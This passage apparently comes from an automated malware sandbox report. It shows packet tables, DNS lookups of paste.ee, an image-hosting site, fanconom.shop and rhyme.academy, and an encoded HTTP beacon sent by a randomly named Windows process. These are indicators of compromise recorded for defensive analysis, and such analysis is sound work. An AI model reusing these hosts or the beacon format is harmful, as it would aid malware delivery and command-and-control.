Apr 17, 2024 08:39:26.723855019 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.773324013 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.773416042 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.773442030 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.773542881 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.773596048 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.773606062 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.774039984 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.774082899 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.774101019 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.774111032 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.774137974 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.774846077 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.774907112 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.774914026 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.775002003 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.775460005 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.775520086 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.775527000 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.775583029 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.776422024 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.776480913 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.776501894 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.776549101 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.777344942 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.777409077 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.777416945 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.777462959 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.877212048 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.877321959 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.877357960 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.877396107 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.877419949 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.877437115 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.877451897 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.877526999 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.877692938 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.878006935 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:27.286349058 CEST	49673	443	192.168.2.6	173.222.162.64
Apr 17, 2024 08:39:27.286353111 CEST	49674	443	192.168.2.6	173.222.162.64
Apr 17, 2024 08:39:27.628814936 CEST	49672	443	192.168.2.6	173.222.162.64
Apr 17, 2024 08:39:29.179766893 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:29.179811954 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:29.179900885 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:29.180257082 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:29.180269003 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:29.605916977 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:29.606091022 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:29.607945919 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:29.607959032 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:29.608340979 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:29.609117031 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:29.656114101 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.000473976 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.052050114 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.203414917 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.203449011 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.203494072 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.203514099 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.203520060 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.203535080 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.203535080 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.203569889 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.203602076 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.203602076 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.203742981 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.203744888 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.203789949 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.203830004 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.203830004 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.203840971 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.203866005 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.203932047 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.203932047 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.203932047 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.406181097 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.406244993 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.406332970 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.406332970 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.406351089 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.406620979 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.406672955 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.406680107 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.406680107 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.406707048 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.406757116 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.406757116 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.609055996 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.609126091 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.609251022 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.609276056 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.609374046 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.609407902 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.609426022 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.609443903 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.609463930 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.609525919 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.609525919 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.609565020 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.609605074 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.609653950 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.609653950 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.609661102 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.609853983 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.609863043 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.609888077 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.609934092 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.609960079 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.609960079 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.609967947 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.610022068 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.610022068 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.610029936 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.661304951 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.698179960 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.698246002 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.698296070 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.698309898 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.698340893 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.698340893 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.812041998 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.812138081 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.812280893 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.812280893 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.812297106 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.812372923 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.812416077 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.812427044 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.812458038 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.812484980 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.812484980 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.812573910 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.812613010 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.812681913 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.812681913 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.812690973 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.812740088 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.812741041 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.812741041 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.812764883 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.812808990 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.812829018 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.812829018 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.812838078 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.812886953 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.812887907 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.812899113 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.812922955 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.812956095 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.812963009 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.813016891 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.813016891 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.813024044 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.813318014 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.901426077 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.901495934 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.901571035 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.901587009 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:30.901634932 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:30.901634932 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:31.014826059 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.014908075 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.014934063 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.014990091 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.014992952 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:31.015013933 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.015034914 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.015053034 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.015137911 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:31.015139103 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:31.015157938 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.015275002 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.015299082 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.015382051 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:31.015382051 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:31.015391111 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.015501976 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.015536070 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.015594006 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:31.015594006 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:31.015599966 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.015744925 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.015767097 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.015835047 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:31.015835047 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:31.015841007 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.015852928 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.015875101 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.015985012 CEST	443	49702	185.61.152.60	192.168.2.6
Apr 17, 2024 08:39:31.016033888 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:31.016033888 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:31.017296076 CEST	49702	443	192.168.2.6	185.61.152.60
Apr 17, 2024 08:39:41.153892994 CEST	49698	443	192.168.2.6	173.222.162.64
Apr 17, 2024 08:39:41.306507111 CEST	443	49698	173.222.162.64	192.168.2.6
Apr 17, 2024 08:39:41.307365894 CEST	443	49698	173.222.162.64	192.168.2.6
Apr 17, 2024 08:39:41.307404041 CEST	443	49698	173.222.162.64	192.168.2.6
Apr 17, 2024 08:39:41.307425022 CEST	49698	443	192.168.2.6	173.222.162.64
Apr 17, 2024 08:39:41.307441950 CEST	443	49698	173.222.162.64	192.168.2.6
Apr 17, 2024 08:39:41.307446003 CEST	49698	443	192.168.2.6	173.222.162.64
Apr 17, 2024 08:39:41.307478905 CEST	443	49698	173.222.162.64	192.168.2.6
Apr 17, 2024 08:39:41.307538986 CEST	49698	443	192.168.2.6	173.222.162.64
Apr 17, 2024 08:39:43.507591963 CEST	443	49698	173.222.162.64	192.168.2.6
Apr 17, 2024 08:39:43.507652998 CEST	49698	443	192.168.2.6	173.222.162.64
Apr 17, 2024 08:39:51.847883940 CEST	49698	443	192.168.2.6	173.222.162.64
Apr 17, 2024 08:39:52.000488997 CEST	443	49698	173.222.162.64	192.168.2.6
Apr 17, 2024 08:40:09.666557074 CEST	49709	80	192.168.2.6	216.40.34.41
Apr 17, 2024 08:40:09.797499895 CEST	80	49709	216.40.34.41	192.168.2.6
Apr 17, 2024 08:40:09.797621965 CEST	49709	80	192.168.2.6	216.40.34.41
Apr 17, 2024 08:40:09.798455954 CEST	49709	80	192.168.2.6	216.40.34.41
Apr 17, 2024 08:40:09.941417933 CEST	80	49709	216.40.34.41	192.168.2.6
Apr 17, 2024 08:40:09.941452980 CEST	80	49709	216.40.34.41	192.168.2.6
Apr 17, 2024 08:40:09.941472054 CEST	80	49709	216.40.34.41	192.168.2.6
Apr 17, 2024 08:40:09.941493034 CEST	80	49709	216.40.34.41	192.168.2.6
Apr 17, 2024 08:40:09.941510916 CEST	80	49709	216.40.34.41	192.168.2.6
Apr 17, 2024 08:40:09.941529036 CEST	80	49709	216.40.34.41	192.168.2.6
Apr 17, 2024 08:40:09.941550970 CEST	80	49709	216.40.34.41	192.168.2.6
Apr 17, 2024 08:40:09.941627979 CEST	49709	80	192.168.2.6	216.40.34.41
Apr 17, 2024 08:40:09.942389965 CEST	49709	80	192.168.2.6	216.40.34.41
Apr 17, 2024 08:40:10.073568106 CEST	80	49709	216.40.34.41	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 17, 2024 08:39:20.719436884 CEST	60142	53	192.168.2.6	1.1.1.1
Apr 17, 2024 08:39:20.826445103 CEST	53	60142	1.1.1.1	192.168.2.6
Apr 17, 2024 08:39:24.384593010 CEST	62722	53	192.168.2.6	1.1.1.1
Apr 17, 2024 08:39:24.491599083 CEST	53	62722	1.1.1.1	192.168.2.6
Apr 17, 2024 08:39:29.028093100 CEST	54857	53	192.168.2.6	1.1.1.1
Apr 17, 2024 08:39:29.178647041 CEST	53	54857	1.1.1.1	192.168.2.6
Apr 17, 2024 08:40:09.326869011 CEST	54964	53	192.168.2.6	1.1.1.1
Apr 17, 2024 08:40:09.662036896 CEST	53	54964	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 17, 2024 08:39:20.719436884 CEST	192.168.2.6	1.1.1.1	0xb350	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Apr 17, 2024 08:39:24.384593010 CEST	192.168.2.6	1.1.1.1	0x4e5e	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false
Apr 17, 2024 08:39:29.028093100 CEST	192.168.2.6	1.1.1.1	0x7b4c	Standard query (0)	fanconom.shop	A (IP address)	IN (0x0001)	false
Apr 17, 2024 08:40:09.326869011 CEST	192.168.2.6	1.1.1.1	0x9fb4	Standard query (0)	www.rhyme.academy	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 17, 2024 08:39:20.826445103 CEST	1.1.1.1	192.168.2.6	0xb350	No error (0)	paste.ee		104.21.84.67	A (IP address)	IN (0x0001)	false
Apr 17, 2024 08:39:20.826445103 CEST	1.1.1.1	192.168.2.6	0xb350	No error (0)	paste.ee		172.67.187.200	A (IP address)	IN (0x0001)	false
Apr 17, 2024 08:39:24.491599083 CEST	1.1.1.1	192.168.2.6	0x4e5e	No error (0)	uploaddeimagens.com.br		172.67.215.45	A (IP address)	IN (0x0001)	false
Apr 17, 2024 08:39:24.491599083 CEST	1.1.1.1	192.168.2.6	0x4e5e	No error (0)	uploaddeimagens.com.br		104.21.45.138	A (IP address)	IN (0x0001)	false
Apr 17, 2024 08:39:29.178647041 CEST	1.1.1.1	192.168.2.6	0x7b4c	No error (0)	fanconom.shop		185.61.152.60	A (IP address)	IN (0x0001)	false
Apr 17, 2024 08:39:39.627526999 CEST	1.1.1.1	192.168.2.6	0x8a73	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Apr 17, 2024 08:39:39.627526999 CEST	1.1.1.1	192.168.2.6	0x8a73	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Apr 17, 2024 08:39:40.114027023 CEST	1.1.1.1	192.168.2.6	0xe785	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 17, 2024 08:39:40.114027023 CEST	1.1.1.1	192.168.2.6	0xe785	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 17, 2024 08:39:55.301739931 CEST	1.1.1.1	192.168.2.6	0xa48b	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 17, 2024 08:39:55.301739931 CEST	1.1.1.1	192.168.2.6	0xa48b	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 17, 2024 08:40:09.662036896 CEST	1.1.1.1	192.168.2.6	0x9fb4	No error (0)	www.rhyme.academy		216.40.34.41	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.ee

uploaddeimagens.com.br

fanconom.shop

www.rhyme.academy

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49709	216.40.34.41	80	2988	C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 08:40:09.798455954 CEST	480	OUT	GET /avr4/?-zd=Xr58V0PHlxJ&0Zut6f=x3E/o0JgLrsAY3mnIEvxKvoKIfHhyrIBWJwB0arEEJoLlbt8V3ExA9cg1sEiGVbm5mLCkgWBOmXsxt02WvVKyLItEbcRwm1+9Ok94pNpJk46kEUPTjVsVLh1d58gSyvREgIt0DM= HTTP/1.1 Host: www.rhyme.academy Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Apr 17, 2024 08:40:09.941417933 CEST	1277	IN	HTTP/1.1 200 OK x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none referrer-policy: strict-origin-when-cross-origin content-type: text/html; charset=utf-8 etag: W/"ceed579826d390c7d48896363515d946" cache-control: max-age=0, private, must-revalidate x-request-id: 1fb7c4f0-619b-4cd4-a0a9-34155f2478d3 x-runtime: 0.008833 transfer-encoding: chunked connection: close Data Raw: 31 37 44 46 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 3a 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 3d 27 20 72 65 6c 3d 27 69 63 6f 6e 27 3e 0a 3c 74 69 74 6c 65 3e 72 68 79 6d 65 2e 61 63 61 64 65 6d 79 20 69 73 20 65 78 70 69 72 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 34 30 30 2c 36 30 30 2c 37 30 30 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2d 32 66 37 65 37 66 33 30 64 38 31 32 64 30 66 33 39 35 30 39 31 38 63 37 35 36 32 64 66 37 65 36 38 65 65 65 65 62 64 38 36 34 39 62 64 65 61 32 62 63 33 38 34 34 65 62 30 37 66 63 38 32 36 39 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 3f 73 6f 75 72 63 65 3d 65 78 70 69 72 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 Data Ascii: 17DF<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>rhyme.academy is expired</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=expired"><img width="102" height="30" src="/asset
